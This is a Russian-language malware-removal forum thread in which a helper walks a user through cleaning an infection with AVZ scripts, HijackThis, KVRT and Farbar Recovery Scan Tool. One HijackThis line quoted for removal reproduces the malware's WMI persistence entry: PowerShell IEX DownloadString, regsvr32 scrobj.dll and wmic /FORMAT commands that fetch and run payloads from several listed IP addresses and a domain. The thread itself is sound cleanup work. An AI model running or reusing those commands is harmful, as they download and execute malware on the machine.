• Внимание. Восстановление баз 1С7, 1C8 и Mssql после атаки шифровальщика, подробности и отзывы читайте в профильной теме.

Решена Mysa 1,2,3 + ok

Статус
В этой теме нельзя размещать новые ответы.

arsuspo

Новый пользователь
Сообщения
5
Реакции
0
Баллы
1
Здравствуйте, здесь, на форуме увидел темы, которые соотносятся с моей проблемой, и поэтому скидываю логи.
 

Вложения

akok

Команда форума
Администратор
Сообщения
17,981
Реакции
13,570
Баллы
2,203
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ из папки Autologger (Файл - Выполнить скрипт):
Код:
  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 QuarantineFile('c:\windows\inf\aspnet\lsma.exe','');
 DeleteFile('c:\windows\inf\aspnet\lsma.exe','64');
 DeleteSchedulerTask('oka');
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.
Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://80.85.158.117:8117/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://80.85.158.117:8117/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"
1. Скачайте утилиту на рабочий стол.
2. Запустите KVRT и подтвердите согласие с условиями использования
3. Дождитесь завершения инициализации и в открывшемся окне нажмите на кнопку "Изменить параметры"
4. В открывшемся меню, поставьте галочку напротив "Системный раздел" и нажмите "Ок"
5. Нажмите кнопку "Начать проверку" для начала сканирования и пролечите все найденое.
6. Дождитесь завершения сканирования и зайдите в папку C:\KVRT_Data\ (C:\ это обычно раздел, где установлена работающая версия Windows) и упакуйте папку Reports в архив и прикрепите к теме
 

akok

Команда форума
Администратор
Сообщения
17,981
Реакции
13,570
Баллы
2,203
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

akok

Команда форума
Администратор
Сообщения
17,981
Реакции
13,570
Баллы
2,203
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    VirusTotal: C:\Windows\system32\n1.dat;C:\Windows\system32\n.dat;
    HKLM\...\Run: [] => [X]
    HKLM-x32\...\Run: [] => [X]
    HKU\S-1-5-21-2843635995-2632599509-2577391226-1000\...\Run: [] => [X]
    Task: {A847B2E6-1017-45F7-9E6A-E6D6E7010A41} - \Mysa2 -> No File <==== ATTENTION
    Task: {BF753883-F886-4E0A-AD0D-7D03B675FEFC} - \Mysa -> No File <==== ATTENTION
    Task: {D5006E2D-B874-42BC-95A4-E7C1DEB29859} - \Mysa3 -> No File <==== ATTENTION
    FF ProfilePath: C:\Users\Юservice\AppData\Roaming\Mozilla\Firefox\Profiles\vyu7k7yd.default-1426025487454 [not found] <==== ATTENTION
    FF ProfilePath: C:\ProgramData\Kaspersky Lab\SafeBrowser\S-1-5-21-3591597119-369042605-4045123810-1000\FireFox [not found] <==== ATTENTION
    FF ProfilePath: C:\Users\Юservice\AppData\Roaming\Mozilla\Firefox\Profiles\zambwcgc.default-release [not found] <==== ATTENTION
    2019-10-16 16:01 - 2019-11-03 18:01 - 000000081 _____ C:\Windows\system32\s
    2019-10-16 16:01 - 2019-11-03 18:01 - 000000079 _____ C:\Windows\system32\ps
    2019-10-16 16:01 - 2019-11-03 18:01 - 000000077 _____ C:\Windows\system32\p
    FirewallRules: [{4E964037-929A-4A07-A560-01ADED0F2CFC}] => (Allow) C:\Users\Юservice\AppData\Local\Temp\7ZipSfx.000\bin\tools\aria2c.exe No File
    FirewallRules: [{2B681B90-8DAE-43BB-9C75-89A5AAE016DA}] => (Allow) C:\Program Files (x86)\DriverPack Cloud\cloud.exe No File
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
 

akok

Команда форума
Администратор
Сообщения
17,981
Реакции
13,570
Баллы
2,203
Смотрится неплохо, что с проблемой?
 

arsuspo

Новый пользователь
Сообщения
5
Реакции
0
Баллы
1
Пока ничего не могу сказать - в автозагрузках не вижу, файлов, которые они порождают пока тоже. Если вдруг начнётся, то снова скидывать логи?
 

akok

Команда форума
Администратор
Сообщения
17,981
Реакции
13,570
Баллы
2,203
Да, понаблюдайте пару дней, если все хорошо закрою тему.

Ну и анализ защищенности проведем. Подготовьте лог SecurityCheck by glax24
 

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
5,587
Реакции
1,858
Баллы
563
Здравствуйте!

Ввиду отсутствия активности в течение последних 10 дней, предположу, что помощь больше не нужна. Поэтому тема закрывается.
Если Вам по-прежнему нужна помощь, отправьте личное сообщение одному из модераторов и укажите ссылку на эту тему.

Спасибо за использование нашего форума и удачи!
 
Статус
В этой теме нельзя размещать новые ответы.

Similar Threads

Ответы
15
Просмотры
565
Ответы
9
Просмотры
2K
Ответы
11
Просмотры
614
Ответы
18
Просмотры
1K
Ответы
15
Просмотры
1K
Сверху Снизу